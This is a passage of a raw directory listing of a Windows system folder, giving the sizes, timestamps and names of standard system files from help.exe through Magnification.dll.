11776 09/15/2018 07:29:14 help.exe +F 55808 09/15/2018 07:29:16 HelpPaneProxy.dll +F 620032 09/15/2018 07:28:50 hgcpl.dll +F 225792 09/15/2018 07:29:25 hgprint.dll +F 695296 03/07/2020 00:54:15 hhctrl.ocx +F 55808 09/15/2018 07:29:18 hhsetup.dll +F 38912 09/15/2018 07:28:50 hid.dll +F 39936 09/15/2018 07:29:21 hidphone.tsp +F 34816 09/15/2018 07:28:51 hidserv.dll +F 101376 03/07/2020 00:53:57 hlink.dll +F 59904 
03/07/2020 00:53:33 hmkd.dll +F 400384 09/15/2018 07:29:18 hnetcfg.dll +F 257536 09/15/2018 07:28:57 HNetCfgClient.dll +F 16384 09/15/2018 07:29:18 hnetmon.dll +F 14336 09/15/2018 07:29:14 HOSTNAME.EXE +F 90624 09/15/2018 07:28:56 hotplug.dll +D 0 09/15/2018 09:09:27 hr-HR +F 479744 09/15/2018 07:28:22 HrtfApo.dll +F 424448 09/15/2018 07:29:16 html.iec +F 33280 09/15/2018 07:28:46 httpapi.dll +F 18944 09/15/2018 07:28:56 httpprxc.dll +F 119808 09/15/2018 07:28:56 httpprxm.dll +F 19456 09/15/2018 07:28:56 httpprxp.dll +F 251904 03/07/2020 00:53:43 HttpsDataSource.dll +F 42496 09/15/2018 07:28:57 htui.dll +D 0 09/15/2018 09:09:27 hu-HU +F 1049400 03/07/2020 00:53:22 hvax64.exe +F 61480 03/07/2020 00:53:22 hvhostsvc.dll +F 1258296 03/07/2020 00:53:22 hvix64.exe +F 90632 03/07/2020 00:53:22 hvloader.dll +F 141328 09/15/2018 09:09:58 hvsievaluator.exe +F 140304 09/15/2018 09:10:05 hvsigpext.dll +F 38712 09/15/2018 07:29:24 HvSocket.dll +D 0 09/15/2018 07:34:00 ias +F 31232 09/15/2018 07:29:18 ias.dll +F 87040 09/15/2018 07:29:18 iasacct.dll +F 76288 09/15/2018 07:29:18 iasads.dll +F 76800 09/15/2018 07:29:18 iasdatastore.dll +F 91648 09/15/2018 07:29:18 iashlpr.dll +F 695608 09/15/2018 07:29:18 IasMigPlugin.dll +F 147456 09/15/2018 07:29:18 iasnap.dll +F 50176 09/15/2018 07:29:18 iaspolcy.dll +F 234496 09/15/2018 07:29:18 iasrad.dll +F 181760 09/15/2018 07:29:18 iasrecst.dll +F 262656 09/15/2018 07:29:18 iassam.dll +F 462848 09/15/2018 07:29:18 iassdo.dll +F 147968 09/15/2018 07:29:16 iassvcs.dll +F 37888 09/15/2018 07:29:16 icacls.exe +F 102400 09/15/2018 07:28:34 icfupgd.dll +F 253952 09/15/2018 07:28:34 icm32.dll +F 3072 09/15/2018 07:29:16 icmp.dll +F 26624 09/15/2018 07:28:52 icmui.dll +F 14336 09/15/2018 07:28:51 IconCodecService.dll +F 36864 09/15/2018 07:28:34 IcsEntitlementHost.exe +F 201216 09/15/2018 07:29:18 icsigd.dll +F 17408 09/15/2018 07:28:57 icsunattend.exe +F 300024 03/07/2020 00:53:22 icsvc.dll +F 310784 03/07/2020 00:53:22 icsvcext.dll +D 0 
09/15/2018 07:34:00 icsxml +F 1860096 03/07/2020 00:53:26 icuin.dll +F 1347072 09/15/2018 07:28:36 icuuc.dll +F 115712 09/15/2018 07:28:57 IdCtrls.dll +F 60458 09/15/2018 07:29:22 ideograf.uce +F 198144 09/15/2018 07:28:45 IdListen.dll +F 10240 09/15/2018 07:28:52 idndl.dll +F 142848 09/15/2018 07:28:30 IDStore.dll +F 228352 03/07/2020 00:54:13 ie4uinit.exe +F 74752 09/15/2018 07:29:16 ie4ushowIE.exe +F 144384 09/15/2018 07:29:18 IEAdvpack.dll +F 1605632 09/15/2018 07:29:16 ieapfltr.dll +F 398848 03/07/2020 00:54:15 iedkcs32.dll +F 13013504 03/07/2020 00:54:15 ieframe.dll +F 65536 09/15/2018 07:29:17 iemigplugin.dll +F 144896 09/15/2018 07:29:18 iepeers.dll +F 852480 03/07/2020 00:54:13 ieproxy.dll +F 46592 09/15/2018 07:29:16 iernonce.dll +F 2779272 03/07/2020 00:53:57 iertutil.dll +F 78336 09/15/2018 07:29:16 iesetup.dll +F 45568 09/15/2018 07:29:17 iesysprep.dll +F 563200 09/15/2018 07:29:18 ieui.dll +F 3329 09/15/2018 07:29:16 ieuinit.inf +F 153088 09/15/2018 07:29:18 ieUnatt.exe +F 166912 09/15/2018 07:29:16 iexpress.exe +F 31232 09/15/2018 07:29:14 ifmon.dll +F 213816 09/15/2018 07:28:38 ifsutil.dll +F 16896 09/15/2018 07:29:22 ifsutilx.dll +F 86528 09/15/2018 07:29:23 igdDiag.dll +F 199680 03/07/2020 00:53:31 IHDS.dll +F 69632 09/15/2018 07:28:25 ihvrilproxy.dll +F 1059328 03/07/2020 00:53:40 IKEEXT.DLL +F 36680 09/15/2018 07:28:20 imaadp32.acm +F 106896 09/15/2018 07:28:46 imagehlp.dll +F 23542784 09/15/2018 07:28:25 imageres.dll +F 694784 09/15/2018 07:28:25 imagesp1.dll +F 137216 09/15/2018 07:29:18 imapi.dll +F 519680 09/15/2018 07:29:16 imapi2.dll +F 994304 09/15/2018 07:29:18 imapi2fs.dll +D 0 09/15/2018 07:33:50 IME +F 56320 09/15/2018 07:29:18 imgutil.dll +F 177176 03/07/2020 00:53:55 imm32.dll +F 136704 09/15/2018 07:28:58 immersivetpmvscmgrsvr.exe +F 134456 03/07/2020 00:53:44 ImplatSetup.dll +F 248832 03/07/2020 00:54:13 IndexedDbLegacy.dll +F 1002496 09/15/2018 07:29:20 inetcomm.dll +F 2096640 03/07/2020 00:54:13 inetcpl.cpl +F 66560 09/15/2018 
07:29:14 inetmib1.dll +F 177664 09/15/2018 07:29:24 inetpp.dll +F 34304 09/15/2018 07:29:24 inetppui.dll +F 85504 09/15/2018 07:29:20 INETRES.dll +D 0 09/15/2018 07:33:50 inetsrv +F 13312 09/15/2018 07:28:56 InfDefaultInstall.exe +F 266240 09/15/2018 07:28:44 InkEd.dll +F 932352 09/15/2018 07:28:32 InkObjCore.dll +F 59904 09/14/2018 18:04:00 InprocLogger.dll +F 363320 03/07/2020 00:53:53 input.dll +F 63488 09/15/2018 07:29:13 InputController.dll +F 833064 03/07/2020 00:53:41 InputHost.dll +F 110592 09/15/2018 07:28:30 InputInjectionBroker.dll +F 138752 03/07/2020 00:53:40 InputLocaleManager.dll +D 0 09/15/2018 07:33:50 InputMethod +F 5528576 03/07/2020 00:53:40 InputService.dll +F 487936 03/07/2020 00:53:53 InputSwitch.dll +F 1284 09/15/2018 07:28:22 InputSystemToastIcon.contrast-white.png +F 917 09/15/2018 07:28:22 InputSystemToastIcon.png +F 116736 09/15/2018 07:29:16 inseng.dll +F 1671680 03/07/2020 00:53:41 InstallService.dll +F 215552 03/07/2020 00:53:41 InstallServiceTasks.dll +F 751104 09/14/2018 17:56:00 internetmail.dll +F 95232 09/14/2018 17:58:00 InternetMailCsp.dll +F 491520 03/07/2020 00:53:43 intl.cpl +F 465424 03/07/2020 00:53:51 invagent.dll +F 2560 09/15/2018 07:28:52 iologmsg.dll +F 174080 03/07/2020 00:53:31 IoTAssignedAccessLockFramework.dll +F 148000 09/15/2018 09:09:56 iotstartup.exe +F 34816 09/15/2018 07:29:14 ipconfig.exe +F 70656 09/15/2018 07:28:39 IPELoggingDictationHelper.dll +F 241944 03/07/2020 00:53:26 IPHLPAPI.DLL +F 834048 03/07/2020 00:53:44 iphlpsvc.dll +D 0 09/15/2018 07:33:50 Ipmi +F 629760 03/07/2020 00:53:45 ipnathlp.dll +F 32256 09/15/2018 07:28:57 IpNatHlpClient.dll +F 11776 09/15/2018 07:28:57 iprtprio.dll +F 565760 03/07/2020 00:53:45 iprtrmgr.dll +F 830976 09/15/2018 07:28:50 ipsecsnp.dll +F 447488 09/15/2018 07:28:50 IPSECSVC.DLL +F 510976 09/15/2018 07:28:50 ipsmsnap.dll +F 64512 09/15/2018 07:28:20 ipxlatcfg.dll +F 19968 09/15/2018 07:29:24 irclass.dll +F 186368 09/15/2018 07:29:24 irftp.exe +F 50616 09/15/2018 
07:28:51 iri.dll +F 24576 09/15/2018 07:29:24 irmon.dll +F 423424 09/15/2018 07:29:24 irprops.cpl +F 155648 09/15/2018 07:29:16 iscsicli.exe +F 229376 09/15/2018 07:29:18 iscsicpl.dll +F 122368 09/15/2018 07:29:18 iscsicpl.exe +F 76288 09/15/2018 07:29:16 iscsidsc.dll +F 12288 09/15/2018 07:29:17 iscsied.dll +F 151552 09/15/2018 07:29:16 iscsiexe.dll +F 16896 09/15/2018 07:28:18 iscsilog.dll +F 35840 09/15/2018 07:29:17 iscsium.dll +F 77824 03/07/2020 00:54:11 iscsiwmi.dll +F 130048 09/15/2018 07:29:17 iscsiwmiv2.dll +F 1715712 03/07/2020 00:53:41 ISM.dll +F 118784 09/15/2018 07:29:18 isoburn.exe +D 0 09/15/2018 09:09:27 it-IT +F 199168 09/15/2018 07:29:16 itircl.dll +F 173568 03/07/2020 00:54:15 itss.dll +F 51360 09/15/2018 07:28:59 iuilp.dll +F 24472 09/15/2018 07:29:13 iumbase.dll +F 66624 09/15/2018 07:28:59 iumcrypt.dll +F 15728 09/15/2018 07:29:13 iumdll.dll +F 22624 09/15/2018 07:29:13 IumSdk.dll +F 54272 09/15/2018 07:29:21 iyuv_32.dll +D 0 03/07/2020 00:55:54 ja-jp +F 96768 09/15/2018 07:29:16 JavaScriptCollectionAgent.dll +F 55808 09/15/2018 07:28:56 joinproviderol.dll +F 152576 09/15/2018 07:28:56 joinutil.dll +F 98304 09/15/2018 07:29:14 joy.cpl +F 714240 03/07/2020 00:53:42 JpMapControl.dll +F 377344 03/07/2020 00:53:31 jpndecoder.dll +F 54784 09/15/2018 07:28:22 jpninputrouter.dll +F 289792 03/07/2020 00:53:31 jpnranker.dll +F 244224 03/07/2020 00:53:28 JpnServiceDS.dll +F 840192 03/07/2020 00:54:11 jscript.dll +F 4872704 03/07/2020 00:54:12 jscript9.dll +F 703488 03/07/2020 00:54:13 jscript9diag.dll +F 53248 09/15/2018 07:28:50 jsproxy.dll +F 6948 09/15/2018 07:29:22 kanji_1.uce +F 8484 09/15/2018 07:29:22 kanji_2.uce +F 8192 09/15/2018 07:28:52 kbd101.dll +F 7680 09/15/2018 07:28:52 kbd101a.dll +F 7680 09/15/2018 07:28:52 kbd101b.dll +F 7680 09/15/2018 07:28:52 kbd101c.dll +F 7680 09/15/2018 07:28:53 kbd103.dll +F 8192 09/15/2018 07:28:52 kbd106.dll +F 8192 09/15/2018 07:28:52 kbd106n.dll +F 7680 09/15/2018 07:28:53 KBDA1.DLL +F 7168 09/15/2018 
07:28:52 KBDA2.DLL +F 7680 09/15/2018 07:28:52 KBDA3.DLL +F 8192 09/15/2018 07:28:52 KBDAL.DLL +F 7168 09/15/2018 07:28:52 KBDARME.DLL +F 7680 09/15/2018 07:28:52 kbdarmph.dll +F 7680 09/15/2018 07:28:52 kbdarmty.dll +F 7168 09/15/2018 07:28:52 KBDARMW.DLL +F 8192 09/15/2018 07:28:52 kbdax2.dll +F 7680 09/15/2018 07:28:52 KBDAZE.DLL +F 7680 09/15/2018 07:28:52 KBDAZEL.DLL +F 7680 09/15/2018 07:28:52 KBDAZST.DLL +F 7680 09/15/2018 07:28:52 KBDBASH.DLL +F 7680 09/15/2018 07:28:52 KBDBE.DLL +F 8192 09/15/2018 07:28:52 KBDBENE.DLL +F 7680 09/15/2018 07:28:52 KBDBGPH.DLL +F 7680 09/15/2018 07:28:52 KBDBGPH1.DLL +F 7680 09/15/2018 07:28:52 KBDBHC.DLL +F 7680 09/15/2018 07:28:53 KBDBLR.DLL +F 7680 09/15/2018 07:28:52 KBDBR.DLL +F 7680 09/15/2018 07:28:53 KBDBU.DLL +F 7680 09/15/2018 07:28:52 KBDBUG.DLL +F 7680 09/15/2018 07:28:52 KBDBULG.DLL +F 8192 09/15/2018 07:28:52 KBDCA.DLL +F 9216 09/15/2018 07:28:52 KBDCAN.DLL +F 7680 09/15/2018 07:28:52 KBDCHER.DLL +F 17408 09/15/2018 07:28:52 KBDCHERP.DLL +F 8704 09/15/2018 07:28:52 KBDCR.DLL +F 8704 09/15/2018 07:28:52 KBDCZ.DLL +F 8704 09/15/2018 07:28:52 KBDCZ1.DLL +F 8704 09/15/2018 07:28:52 KBDCZ2.DLL +F 7680 09/15/2018 07:28:52 KBDDA.DLL +F 7680 09/15/2018 07:28:53 KBDDIV1.DLL +F 7680 09/15/2018 07:28:52 KBDDIV2.DLL +F 7168 09/15/2018 07:28:52 KBDDV.DLL +F 7680 09/15/2018 07:28:53 KBDDZO.DLL +F 8192 09/15/2018 07:28:52 KBDES.DLL +F 7680 09/15/2018 07:28:52 KBDEST.DLL +F 7168 09/15/2018 07:28:52 KBDFA.DLL +F 7680 09/15/2018 07:28:52 kbdfar.dll +F 8192 09/15/2018 07:28:52 KBDFC.DLL +F 7680 09/15/2018 07:28:52 KBDFI.DLL +F 8704 09/15/2018 07:28:52 KBDFI1.DLL +F 7680 09/15/2018 07:28:52 KBDFO.DLL +F 7680 09/15/2018 07:28:52 KBDFR.DLL +F 7680 09/15/2018 07:28:53 KBDFTHRK.DLL +F 7680 09/15/2018 07:28:52 KBDGAE.DLL +F 7168 09/15/2018 07:28:52 KBDGEO.DLL +F 7680 09/15/2018 07:28:52 kbdgeoer.dll +F 7680 09/15/2018 07:28:52 kbdgeome.dll +F 7680 09/15/2018 07:28:52 kbdgeooa.dll +F 7680 09/15/2018 07:28:52 kbdgeoqw.dll +F 8192 
09/15/2018 07:28:52 KBDGKL.DLL +F 8192 09/15/2018 07:28:53 KBDGN.DLL +F 7680 09/15/2018 07:28:52 KBDGR.DLL +F 8192 09/15/2018 07:28:52 KBDGR1.DLL +F 8704 09/15/2018 07:28:52 KBDGRLND.DLL +F 7680 09/15/2018 07:28:52 KBDGTHC.DLL +F 7168 09/15/2018 07:28:52 KBDHAU.DLL +F 7680 09/15/2018 07:28:53 KBDHAW.DLL +F 7680 09/15/2018 07:28:52 KBDHE.DLL +F 8192 09/15/2018 07:28:52 KBDHE220.DLL +F 7680 09/15/2018 07:28:52 KBDHE319.DLL +F 7168 09/15/2018 07:28:52 KBDHEB.DLL +F 7680 09/15/2018 07:28:52 kbdhebl3.dll +F 8192 09/15/2018 07:28:52 KBDHELA2.DLL +F 8192 09/15/2018 07:28:52 KBDHELA3.DLL +F 10240 09/15/2018 07:28:52 KBDHEPT.DLL +F 8192 09/15/2018 07:28:52 KBDHU.DLL +F 7680 09/15/2018 07:28:52 KBDHU1.DLL +F 8704 09/15/2018 07:28:53 kbdibm02.dll +F 8192 09/15/2018 07:28:53 KBDIBO.DLL +F 7168 09/15/2018 07:28:52 KBDIC.DLL +F 7680 09/15/2018 07:28:52 KBDINASA.DLL +F 7680 09/15/2018 07:28:52 KBDINBE1.DLL +F 7680 09/15/2018 07:28:52 KBDINBE2.DLL +F 8192 09/15/2018 07:28:52 KBDINBEN.DLL +F 7680 09/15/2018 07:28:52 KBDINDEV.DLL +F 9216 09/15/2018 07:28:52 KBDINEN.DLL +F 7680 09/15/2018 07:28:52 KBDINGUJ.DLL +F 7680 09/15/2018 07:28:52 KBDINHIN.DLL +F 7680 09/15/2018 07:28:52 KBDINKAN.DLL +F 8192 09/15/2018 07:28:52 KBDINMAL.DLL +F 7680 09/15/2018 07:28:52 KBDINMAR.DLL +F 8192 09/15/2018 07:28:52 KBDINORI.DLL +F 7680 09/15/2018 07:28:52 KBDINPUN.DLL +F 7680 09/15/2018 07:28:52 KBDINTAM.DLL +F 7680 09/15/2018 07:28:52 KBDINTEL.DLL +F 8704 09/15/2018 07:28:52 KBDINUK2.DLL +F 7168 09/15/2018 07:28:52 KBDIR.DLL +F 7168 09/15/2018 07:28:53 KBDIT.DLL +F 7680 09/15/2018 07:28:52 KBDIT142.DLL +F 8192 09/15/2018 07:28:52 KBDIULAT.DLL +F 7680 09/15/2018 07:28:53 KBDJAV.DLL +F 15872 09/15/2018 07:28:53 KBDJPN.DLL +F 7680 09/15/2018 07:28:52 KBDKAZ.DLL +F 7680 09/15/2018 07:28:53 KBDKHMR.DLL +F 7680 09/15/2018 07:28:52 KBDKNI.DLL +F 15360 09/15/2018 07:28:53 KBDKOR.DLL +F 7680 09/15/2018 07:28:53 KBDKURD.DLL +F 7168 09/15/2018 07:28:53 KBDKYR.DLL +F 8192 09/15/2018 07:28:52 KBDLA.DLL +F 7680 
09/15/2018 07:28:53 KBDLAO.DLL +F 7680 09/15/2018 07:28:52 kbdlisub.dll +F 7680 09/15/2018 07:28:52 kbdlisus.dll +F 8704 09/15/2018 07:28:53 kbdlk41a.dll +F 7168 09/15/2018 07:28:52 KBDLT.DLL +F 7680 09/15/2018 07:28:52 KBDLT1.DLL +F 7680 09/15/2018 07:28:52 KBDLT2.DLL +F 7680 09/15/2018 07:28:52 KBDLV.DLL +F 8192 09/15/2018 07:28:52 KBDLV1.DLL +F 9216 09/15/2018 07:28:52 KBDLVST.DLL +F 7680 09/15/2018 07:28:52 KBDMAC.DLL +F 7680 09/15/2018 07:28:52 KBDMACST.DLL +F 7680 09/15/2018 07:28:53 KBDMAORI.DLL +F 7680 09/15/2018 07:28:52 KBDMLT47.DLL +F 7680 09/15/2018 07:28:52 KBDMLT48.DLL +F 7680 09/15/2018 07:28:53 KBDMON.DLL +F 7680 09/15/2018 07:28:53 KBDMONMO.DLL +F 7680 09/15/2018 07:28:52 KBDMONST.DLL +F 7680 09/15/2018 07:28:52 KBDMYAN.DLL +F 7680 09/15/2018 07:28:53 KBDNE.DLL +F 8704 09/15/2018 07:28:52 kbdnec.dll +F 8704 09/15/2018 07:28:52 kbdnec95.dll +F 10752 09/15/2018 07:28:53 kbdnecat.dll +F 9216 09/15/2018 07:28:52 kbdnecnt.dll +F 8192 09/15/2018 07:28:53 KBDNEPR.DLL +F 7168 09/15/2018 07:28:52 kbdnko.dll +F 7680 09/15/2018 07:28:53 KBDNO.DLL +F 8704 09/15/2018 07:28:52 KBDNO1.DLL +F 8704 09/15/2018 07:28:52 KBDNSO.DLL +F 7680 09/15/2018 07:28:52 KBDNTL.DLL +F 7680 09/15/2018 07:28:52 KBDOGHAM.DLL +F 7680 09/15/2018 07:28:52 KBDOLCH.DLL +F 7680 09/15/2018 07:28:53 KBDOLDIT.DLL +F 7680 09/15/2018 07:28:53 KBDOSM.DLL +F 7680 09/15/2018 07:28:53 KBDPASH.DLL +F 7680 09/15/2018 07:28:52 kbdphags.dll +F 8192 09/15/2018 07:28:52 KBDPL.DLL +F 8192 09/15/2018 07:28:52 KBDPL1.DLL +F 8192 09/15/2018 07:28:52 KBDPO.DLL +F 8704 09/15/2018 07:28:52 KBDRO.DLL +F 9216 09/15/2018 07:28:52 KBDROPR.DLL +F 9216 09/15/2018 07:28:52 KBDROST.DLL +F 7168 09/15/2018 07:28:52 KBDRU.DLL +F 7680 09/15/2018 07:28:52 KBDRU1.DLL +F 9216 09/15/2018 07:28:52 KBDRUM.DLL +F 8192 09/15/2018 07:28:52 KBDSF.DLL +F 8704 09/15/2018 07:28:52 KBDSG.DLL +F 8192 09/15/2018 07:28:52 KBDSL.DLL +F 8704 09/15/2018 07:28:52 KBDSL1.DLL +F 9216 09/15/2018 07:28:52 KBDSMSFI.DLL +F 9216 09/15/2018 07:28:52 
KBDSMSNO.DLL +F 7168 09/15/2018 07:28:52 KBDSN1.DLL +F 7680 09/15/2018 07:28:53 KBDSORA.DLL +F 8704 09/15/2018 07:28:52 KBDSOREX.DLL +F 8192 09/15/2018 07:28:52 KBDSORS1.DLL +F 8704 09/15/2018 07:28:52 KBDSORST.DLL +F 7680 09/15/2018 07:28:52 KBDSP.DLL +F 7680 09/15/2018 07:28:52 KBDSW.DLL +F 8192 09/15/2018 07:28:52 KBDSW09.DLL +F 7680 09/15/2018 07:28:52 KBDSYR1.DLL +F 7680 09/15/2018 07:28:52 KBDSYR2.DLL +F 7680 09/15/2018 07:28:52 KBDTAILE.DLL +F 7680 09/15/2018 07:28:52 KBDTAJIK.DLL +F 7680 09/15/2018 07:28:52 KBDTAM99.DLL +F 7680 09/15/2018 07:28:53 KBDTAT.DLL +F 7680 09/15/2018 07:28:52 KBDTH0.DLL +F 7680 09/15/2018 07:28:52 KBDTH1.DLL +F 7680 09/15/2018 07:28:52 KBDTH2.DLL +F 7680 09/15/2018 07:28:52 KBDTH3.DLL +F 7680 09/15/2018 07:28:52 KBDTIFI.DLL +F 7680 09/15/2018 07:28:52 KBDTIFI2.DLL +F 8192 09/15/2018 07:28:53 KBDTIPRC.DLL +F 8704 09/15/2018 07:28:52 KBDTIPRD.DLL +F 7680 09/15/2018 07:28:52 KBDTT102.DLL +F 8704 09/15/2018 07:28:52 KBDTUF.DLL +F 8192 09/15/2018 07:28:52 KBDTUQ.DLL +F 7680 09/15/2018 07:28:53 KBDTURME.DLL +F 8192 09/15/2018 07:28:52 KBDTZM.DLL +F 7680 09/15/2018 07:28:53 KBDUGHR.DLL +F 7680 09/15/2018 07:28:52 KBDUGHR1.DLL +F 7168 09/15/2018 07:28:52 KBDUK.DLL +F 8704 09/15/2018 07:28:53 KBDUKX.DLL +F 7168 09/15/2018 07:28:53 KBDUR.DLL +F 7680 09/15/2018 07:28:52 KBDUR1.DLL +F 7168 09/15/2018 07:28:53 KBDURDU.DLL +F 9728 09/15/2018 07:28:46 KBDUS.DLL +F 7680 09/15/2018 07:28:52 KBDUSA.DLL +F 7680 09/15/2018 07:28:52 KBDUSL.DLL +F 7680 09/15/2018 07:28:52 KBDUSR.DLL +F 8192 09/15/2018 07:28:52 KBDUSX.DLL +F 7680 09/15/2018 07:28:53 KBDUZB.DLL +F 7680 09/15/2018 07:28:52 KBDVNTC.DLL +F 7680 09/15/2018 07:28:52 KBDWOL.DLL +F 7680 09/15/2018 07:28:53 KBDYAK.DLL +F 7680 09/15/2018 07:28:52 KBDYBA.DLL +F 7680 09/15/2018 07:28:52 KBDYCC.DLL +F 9216 09/15/2018 07:28:52 KBDYCL.DLL +F 15672 09/15/2018 07:28:46 kd.dll +F 28672 09/15/2018 07:28:45 kdcom.dll +F 27136 03/07/2020 00:53:31 kdcpw.dll +F 21304 09/15/2018 07:29:13 kdhvcom.dll +F 121656 
03/07/2020 00:53:54 kdnet.dll +F 17920 09/15/2018 07:29:16 kdnet_uart16550.dll +F 84480 03/07/2020 00:53:26 KdsCli.dll +F 24376 09/15/2018 07:28:46 kdstub.dll +F 44856 09/15/2018 07:29:14 kdusb.dll +F 31232 09/15/2018 07:29:16 kd_02_10df.dll +F 379392 09/15/2018 07:29:16 kd_02_10ec.dll +F 26624 09/15/2018 07:29:16 kd_02_1137.dll +F 216576 09/15/2018 07:29:16 kd_02_14e4.dll +F 44032 09/15/2018 07:29:16 kd_02_15b3.dll +F 43520 09/15/2018 07:29:16 kd_02_1969.dll +F 31232 09/15/2018 07:29:16 kd_02_19a2.dll +F 20480 09/15/2018 07:29:16 kd_02_1af4.dll +F 251904 09/15/2018 07:29:16 kd_02_8086.dll +F 18944 09/15/2018 07:29:16 kd_07_1415.dll +F 41472 09/15/2018 07:29:16 kd_0C_8086.dll +F 74240 09/15/2018 07:28:34 keepaliveprovider.dll +F 152408 03/07/2020 00:53:28 KerbClientShared.dll +F 1005056 03/07/2020 00:53:28 kerberos.dll +F 58880 09/15/2018 07:28:34 kernel.appcore.dll +F 725696 03/07/2020 00:53:52 kernel32.dll +F 2701816 03/07/2020 00:53:54 KernelBase.dll +F 841 09/15/2018 07:28:22 KeyboardSystemToastIcon.contrast-white.png +F 523 09/15/2018 07:28:22 KeyboardSystemToastIcon.png +F 53248 09/15/2018 07:28:51 KeyCredMgr.dll +F 90624 03/07/2020 00:53:26 keyiso.dll +F 166400 09/15/2018 07:28:58 keymgr.dll +F 118784 09/15/2018 07:28:39 KeywordDetectorMsftSidAdapter.dll +F 37376 09/15/2018 07:29:21 klist.exe +F 48128 09/15/2018 07:28:57 kmddsp.tsp +F 256512 03/07/2020 00:53:33 KnobsCore.dll +F 120320 09/15/2018 07:28:25 KnobsCsp.dll +D 0 09/15/2018 09:09:27 ko-KR +F 12876 09/15/2018 07:29:22 korean.uce +F 37888 09/15/2018 07:29:22 ksetup.exe +F 280576 09/15/2018 07:29:22 ksproxy.ax +F 102400 09/15/2018 07:29:24 kstvtune.ax +F 23264 09/15/2018 07:28:22 ksuser.dll +F 137216 09/15/2018 07:29:22 Kswdmcap.ax +F 66560 09/15/2018 07:29:24 ksxbar.ax +F 17920 09/15/2018 07:29:14 ktmutil.exe +F 24064 09/15/2018 07:28:52 ktmw32.dll +F 71168 09/15/2018 07:28:25 l2gpstore.dll +F 62464 09/15/2018 07:28:25 l2nacp.dll +F 200192 09/15/2018 07:28:26 L2SecHC.dll +F 92672 09/15/2018 09:10:04 
l3codeca.acm +F 183296 09/15/2018 09:10:04 l3codecp.acm +F 16896 09/15/2018 07:29:14 label.exe +F 14336 09/15/2018 07:28:53 LangCleanupSysprepAction.dll +F 177152 03/07/2020 00:53:43 LanguageComponentsInstaller.dll +F 51712 09/15/2018 07:28:53 LanguageComponentsInstallerComHandler.exe +F 312320 03/07/2020 00:53:31 LanguageOverlayServer.dll +F 120544 09/15/2018 07:28:22 LanguageOverlayUtil.dll +F 68096 09/15/2018 07:28:53 LanguagePackDiskCleanup.dll +F 13312 09/15/2018 09:09:54 LAPRXY.DLL +F 190760 09/15/2018 07:28:39 LaptopPlugInToastImg.gif +F 149056 09/15/2018 07:28:22 LargeRoom.bin +F 184320 09/15/2018 07:28:42 LaunchTM.exe +F 43520 09/15/2018 07:28:44 LaunchWinApp.exe +F 211938 09/15/2018 07:29:18 lcphrase.tbl +F 24114 09/15/2018 07:29:18 lcptr.tbl +F 68608 09/15/2018 07:28:38 LegacyNetUX.dll +F 197120 09/15/2018 07:28:38 LegacyNetUXHost.exe +F 47104 09/15/2018 07:28:36 lfsvc.dll +F 1609728 09/15/2018 09:08:41 libcrypto.dll +F 1045816 09/15/2018 07:28:34 LicenseManager.dll +F 94720 09/15/2018 07:28:36 LicenseManagerApi.dll +F 47616 09/15/2018 07:28:36 LicenseManagerShellext.exe +F 49664 09/15/2018 07:28:34 LicenseManagerSvc.dll +D 0 09/15/2018 07:33:50 Licenses +F 160768 03/07/2020 00:53:35 LicensingCSP.dll +F 226816 09/15/2018 07:28:29 licensingdiag.exe +F 363520 03/07/2020 00:53:46 LicensingDiagSpp.dll +F 149232 03/07/2020 00:53:53 LicensingUI.exe +F 736272 03/07/2020 00:53:52 LicensingWinRT.dll +F 32768 09/15/2018 07:29:16 licmgr10.dll +F 30720 09/15/2018 07:28:59 linkinfo.dll +F 276992 09/15/2018 07:29:25 ListSvc.dll +F 48128 09/15/2018 07:28:50 lltdapi.dll +F 2560 09/15/2018 07:28:50 lltdres.dll +F 266240 09/15/2018 07:28:50 lltdsvc.dll +F 27136 09/15/2018 07:28:45 lmhsvc.dll +F 122880 09/15/2018 07:28:51 loadperf.dll +F 806568 03/07/2020 00:53:26 locale.nls +F 509440 09/15/2018 07:29:16 localsec.dll +F 1221120 03/07/2020 00:53:33 localspl.dll +F 18944 09/15/2018 07:28:56 localui.dll +F 400384 09/15/2018 07:29:20 LocationApi.dll +F 2084352 03/07/2020 
00:53:40 LocationFramework.dll +F 86016 03/07/2020 00:53:40 LocationFrameworkInternalPS.dll +F 40248 09/15/2018 07:28:36 LocationFrameworkPS.dll +F 67584 09/15/2018 07:29:19 LocationNotificationWindows.exe +F 115200 09/15/2018 07:29:19 LocationWinPalMisc.dll +F 11264 09/15/2018 07:28:42 Locator.exe +F 450048 03/07/2020 00:53:43 LockAppBroker.dll +F 90608 03/07/2020 00:53:43 LockAppHost.exe +F 736256 03/07/2020 00:53:43 LockController.dll +F 440832 03/07/2020 00:53:43 LockHostingFramework.dll +F 162304 09/15/2018 07:28:24 LockScreenContent.dll +F 45568 09/15/2018 07:28:25 LockScreenContentHost.dll +F 48224 09/15/2018 07:28:24 LockScreenContentServer.exe +F 374272 03/07/2020 00:53:43 LockScreenData.dll +F 50176 09/15/2018 07:28:51 lodctr.exe +F 109568 09/15/2018 09:10:01 logagent.exe +D 0 03/29/2020 11:29:52 LogFiles +F 81920 09/15/2018 07:29:21 loghours.dll +F 114688 09/15/2018 07:29:20 logman.exe +F 23040 09/15/2018 09:10:03 logoff.exe +F 253256 03/07/2020 00:53:26 logoncli.dll +F 794112 03/07/2020 00:53:57 LogonController.dll +F 13824 09/15/2018 07:28:45 LogonUI.exe +F 1332224 03/07/2020 00:54:18 lpasvc.dll +F 3072 09/15/2018 07:28:47 lpk.dll +F 41984 03/07/2020 00:53:43 lpkinstall.exe +F 739840 03/07/2020 00:53:43 lpksetup.exe +F 10240 09/15/2018 07:28:53 lpksetupproxyserv.dll +F 57856 09/15/2018 07:28:53 lpremove.exe +F 278416 03/07/2020 00:53:28 LsaIso.exe +F 1674752 03/07/2020 00:53:28 lsasrv.dll +F 57880 09/15/2018 07:28:46 lsass.exe +F 63488 03/07/2020 00:54:24 LSCSHostPolicy.dll +F 658432 03/07/2020 00:53:53 lsm.dll +F 46080 09/15/2018 07:29:22 lsmproxy.dll +F 27136 09/15/2018 09:10:03 lstelemetry.dll +D 0 09/15/2018 09:09:27 lt-LT +F 59192 09/15/2018 07:28:25 luainstall.dll +F 34816 09/15/2018 07:29:25 luiapi.dll +F 144998 09/15/2018 07:28:44 lusrmgr.msc +D 0 09/15/2018 09:09:27 lv-LV +F 3072 09/15/2018 07:28:50 lz32.dll +F 9926 09/15/2018 07:28:46 l_intl.nls +D 0 09/15/2018 07:33:50 Macromed +F 50688 09/15/2018 07:28:43 Magnification.dll +F 832512 
